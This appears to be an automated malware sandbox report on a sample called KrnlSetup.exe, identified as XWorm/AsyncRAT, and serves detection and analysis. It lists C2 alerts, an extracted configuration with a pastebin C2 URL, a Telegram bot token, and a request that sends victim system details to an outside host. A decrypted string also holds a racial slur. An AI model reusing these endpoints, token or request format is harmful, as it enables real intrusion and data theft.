                                    2024-12-10T10:05:21.709750+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:21.829229+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:21.917850+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:22.148168+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:22.269031+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:22.388499+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:22.507997+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:22.617874+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:22.746512+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:22.865936+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:23.105359+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:23.208331+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:23.328595+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:23.448019+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:23.567924+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:23.687430+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:23.802604+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:23.922164+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:24.045611+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:24.165329+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:24.284666+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:24.399411+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:24.530557+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:24.659984+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:24.779401+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:24.898961+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:25.018450+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:25.137856+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:25.359880+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:25.479548+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:25.601845+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:25.721165+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:25.842004+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:25.929310+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:26.049097+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:26.169325+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:26.288740+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:26.527682+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:26.647074+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:26.876964+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:27.011248+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:27.146818+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:27.269718+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:27.390329+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:27.596782+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:27.862581+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:27.982094+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:28.142483+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:28.261891+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:28.382436+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:28.624004+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:28.789710+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:28.911765+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:29.031215+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:29.152823+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:29.257744+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:29.273973+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:29.393724+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:29.513756+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:29.633791+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:29.753195+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    2024-12-10T10:05:29.899277+010028528731Malware Command and Control Activity Detected192.168.2.449797115.69.183.22237593TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-12-10T10:05:26.204070+010028559241Malware Command and Control Activity Detected192.168.2.449751115.69.183.22237593TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-12-10T10:05:19.909745+010028531911Malware Command and Control Activity Detected115.69.183.22237593192.168.2.449751TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-12-10T10:05:19.229984+010028531921Malware Command and Control Activity Detected192.168.2.449751115.69.183.22237593TCP

                                    Joe Sandbox Signatures

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Antivirus / Scanner detection for submitted sample
                                    Source: KrnlSetup.exeAvira: detected
                                    Antivirus detection for dropped file
                                    Source: C:\ProgramData\ntoskrnl.exeAvira: detection malicious, Label: TR/Spy.Gen
                                    Found malware configuration
                                    Source: KrnlSetup.exeMalware Configuration Extractor: Xworm {"C2 url": ["https://pastebin.com/raw/5FinF5Mf"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "drivers.exe", "Version": "XWorm V5.2"}
                                    Source: KrnlSetup.exe.7120.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6521061783:AAGQkZDgpgjXOESj9-XTf5_ylzpA9XFxUw8/sendMessage"}
                                    Multi AV Scanner detection for dropped file
                                    Source: C:\ProgramData\ntoskrnl.exeReversingLabs: Detection: 73%
                                    Multi AV Scanner detection for submitted file
                                    Source: KrnlSetup.exeReversingLabs: Detection: 73%
                                    AI detected suspicious sample
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                    Machine Learning detection for dropped file
                                    Source: C:\ProgramData\ntoskrnl.exeJoe Sandbox ML: detected
                                    Machine Learning detection for sample
                                    Source: KrnlSetup.exeJoe Sandbox ML: detected
                                    Sample uses string decryption to hide its real strings
                                    Source: KrnlSetup.exeString decryptor: https://pastebin.com/raw/5FinF5Mf
                                    Source: KrnlSetup.exeString decryptor: <123456789>
                                    Source: KrnlSetup.exeString decryptor: <Xwormmm>
                                    Source: KrnlSetup.exeString decryptor: niggereezzzz
                                    Source: KrnlSetup.exeString decryptor: drivers.exe
                                    Source: KrnlSetup.exeString decryptor: %ProgramData%
                                    Source: KrnlSetup.exeString decryptor: ntoskrnl.exe
                                    Source: KrnlSetup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\KrnlSetup.exe.logJump to behavior
                                    Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49739 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49745 version: TLS 1.2
                                    Source: KrnlSetup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeCode function: 4x nop then jmp 00007FFD9B793592h0_2_00007FFD9B7933FC
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeCode function: 4x nop then jmp 00007FFD9B794634h0_2_00007FFD9B793FB9
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeCode function: 4x nop then jmp 00007FFD9B794645h0_2_00007FFD9B793FB9
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeCode function: 4x nop then jmp 00007FFD9B795277h0_2_00007FFD9B78EB60

                                    Networking

                                    barindex
                                    Suricata IDS alerts for network traffic
                                    Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 115.69.183.222:37593 -> 192.168.2.4:49751
                                    Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49751 -> 115.69.183.222:37593
                                    Source: Network trafficSuricata IDS: 2852873 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 : 192.168.2.4:49797 -> 115.69.183.222:37593
                                    Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49797 -> 115.69.183.222:37593
                                    Source: Network trafficSuricata IDS: 2853192 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound : 192.168.2.4:49751 -> 115.69.183.222:37593
                                    Source: Network trafficSuricata IDS: 2853191 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound : 115.69.183.222:37593 -> 192.168.2.4:49751
                                    Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 115.69.183.222:37593 -> 192.168.2.4:49751
                                    Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49751 -> 115.69.183.222:37593
                                    Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.4:49745 -> 149.154.167.220:443
                                    C2 URLs / IPs found in malware configuration
                                    Source: Malware configuration extractorURLs: https://pastebin.com/raw/5FinF5Mf
                                    Connects to a pastebin service (likely for C&C)
                                    Source: unknownDNS query: name: pastebin.com
                                    Uses the Telegram API (likely for C&C communication)
                                    Source: unknownDNS query: name: api.telegram.org
                                    Yara detected Generic Downloader
                                    Source: Yara matchFile source: KrnlSetup.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.0.KrnlSetup.exe.1c0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\ProgramData\ntoskrnl.exe, type: DROPPED
                                    Source: global trafficTCP traffic: 192.168.2.4:49751 -> 115.69.183.222:37593
                                    Source: global trafficHTTP traffic detected: GET /raw/5FinF5Mf HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /bot6521061783:AAGQkZDgpgjXOESj9-XTf5_ylzpA9XFxUw8/sendMessage?chat_id=5999137434&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AEF8C18E803B11A27265E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20VO319YB%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20niggereezzzz HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                    Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
                                    Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
                                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                    Source: unknownDNS query: name: ip-api.com
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                                    Source: global trafficHTTP traffic detected: GET /raw/5FinF5Mf HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /bot6521061783:AAGQkZDgpgjXOESj9-XTf5_ylzpA9XFxUw8/sendMessage?chat_id=5999137434&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AEF8C18E803B11A27265E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20VO319YB%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20niggereezzzz HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                                    Source: global trafficDNS traffic detected: DNS query: pastebin.com
                                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                                    Source: powershell.exe, 00000009.00000002.2041628498.00000231C1B87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                                    Source: KrnlSetup.exe, ntoskrnl.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                                    Source: powershell.exe, 00000001.00000002.1775538071.00000279BEA21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1880231335.0000021D6B141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2018106591.00000231B93A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2213754710.000001902066F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                    Source: powershell.exe, 0000000B.00000002.2090871285.0000019010829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                    Source: powershell.exe, 00000001.00000002.1751852336.00000279AEBD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1816594587.0000021D5B2F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1929354665.00000231A955B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2090871285.0000019010829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                    Source: KrnlSetup.exe, 00000000.00000002.2614356137.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1751852336.00000279AE9B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1816594587.0000021D5B0D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1929354665.00000231A9331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2090871285.0000019010601000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: powershell.exe, 00000001.00000002.1751852336.00000279AEBD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1816594587.0000021D5B2F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1929354665.00000231A955B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2090871285.0000019010829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                    Source: powershell.exe, 0000000B.00000002.2090871285.0000019010829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                    Source: powershell.exe, 0000000B.00000002.2242720831.0000019028D4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                                    Source: powershell.exe, 00000001.00000002.1751852336.00000279AE9B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1816594587.0000021D5B0D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1929354665.00000231A9331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2090871285.0000019010601000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                    Source: KrnlSetup.exe, 00000000.00000002.2614356137.0000000002516000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                                    Source: KrnlSetup.exe, ntoskrnl.exe.0.drString found in binary or memory: https://api.telegram.org/bot
                                    Source: KrnlSetup.exe, 00000000.00000002.2614356137.0000000002516000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6521061783:AAGQkZDgpgjXOESj9-XTf5_ylzpA9XFxUw8/sendMessage?chat_id=59991
                                    Source: powershell.exe, 0000000B.00000002.2213754710.000001902066F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                    Source: powershell.exe, 0000000B.00000002.2213754710.000001902066F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                    Source: powershell.exe, 0000000B.00000002.2213754710.000001902066F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                    Source: powershell.exe, 0000000B.00000002.2090871285.0000019010829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                    Source: powershell.exe, 00000009.00000002.2034848231.00000231C178C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
                                    Source: powershell.exe, 00000001.00000002.1775538071.00000279BEA21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1880231335.0000021D6B141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2018106591.00000231B93A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2213754710.000001902066F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                    Source: ntoskrnl.exe, 00000011.00000002.2474120647.0000000002631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/5FinF5Mf
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                                    Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49739 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49745 version: TLS 1.2

                                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                                    barindex
                                    Contains functionality to capture screen (.Net source)
                                    Source: 0.2.KrnlSetup.exe.25e3da0.2.raw.unpack, RemoteDesktop.cs.Net Code: GetScreen
                                    Source: 0.2.KrnlSetup.exe.9f0000.0.raw.unpack, RemoteDesktop.cs.Net Code: GetScreen
                                    Source: 0.2.KrnlSetup.exe.25ee020.1.raw.unpack, RemoteDesktop.cs.Net Code: GetScreen

                                    Operating System Destruction

                                    barindex
                                    Protects its processes via BreakOnTermination flag
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: 01 00 00 00 Jump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: 00 00 00 00 Jump to behavior

                                    System Summary

                                    barindex
                                    Malicious sample detected (through community Yara rule)
                                    Source: KrnlSetup.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                                    Source: 0.0.KrnlSetup.exe.1c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                                    Source: 00000000.00000002.2621934309.00000000124CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                                    Source: 00000000.00000000.1658911108.00000000001C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                                    Source: C:\ProgramData\ntoskrnl.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeCode function: 0_2_00007FFD9B7908140_2_00007FFD9B790814
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeCode function: 0_2_00007FFD9B7893690_2_00007FFD9B789369
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeCode function: 0_2_00007FFD9B791FDA0_2_00007FFD9B791FDA
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeCode function: 0_2_00007FFD9B7817090_2_00007FFD9B781709
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeCode function: 0_2_00007FFD9B7873420_2_00007FFD9B787342
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeCode function: 0_2_00007FFD9B7865960_2_00007FFD9B786596
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeCode function: 0_2_00007FFD9B7824610_2_00007FFD9B782461
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeCode function: 0_2_00007FFD9B7810400_2_00007FFD9B781040
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeCode function: 0_2_00007FFD9B7821C10_2_00007FFD9B7821C1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8330E94_2_00007FFD9B8330E9
                                    Source: C:\ProgramData\ntoskrnl.exeCode function: 15_2_00007FFD9B76170915_2_00007FFD9B761709
                                    Source: C:\ProgramData\ntoskrnl.exeCode function: 15_2_00007FFD9B76102815_2_00007FFD9B761028
                                    Source: C:\ProgramData\ntoskrnl.exeCode function: 15_2_00007FFD9B7621C115_2_00007FFD9B7621C1
                                    Source: C:\ProgramData\ntoskrnl.exeCode function: 16_2_00007FFD9B76170916_2_00007FFD9B761709
                                    Source: C:\ProgramData\ntoskrnl.exeCode function: 16_2_00007FFD9B76102816_2_00007FFD9B761028
                                    Source: C:\ProgramData\ntoskrnl.exeCode function: 16_2_00007FFD9B7621C116_2_00007FFD9B7621C1
                                    Source: C:\ProgramData\ntoskrnl.exeCode function: 17_2_00007FFD9B78170917_2_00007FFD9B781709
                                    Source: C:\ProgramData\ntoskrnl.exeCode function: 17_2_00007FFD9B78102817_2_00007FFD9B781028
                                    Source: C:\ProgramData\ntoskrnl.exeCode function: 17_2_00007FFD9B7821C117_2_00007FFD9B7821C1
                                    Source: KrnlSetup.exe, 00000000.00000002.2614356137.00000000025EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemoteDesktop.dll< vs KrnlSetup.exe
                                    Source: KrnlSetup.exe, 00000000.00000002.2614356137.00000000025CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemoteDesktop.dll< vs KrnlSetup.exe
                                    Source: KrnlSetup.exe, 00000000.00000002.2607307825.0000000000733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameschtasks.exe.muij% vs KrnlSetup.exe
                                    Source: KrnlSetup.exe, 00000000.00000002.2613437985.00000000009F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRemoteDesktop.dll< vs KrnlSetup.exe
                                    Source: KrnlSetup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: KrnlSetup.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
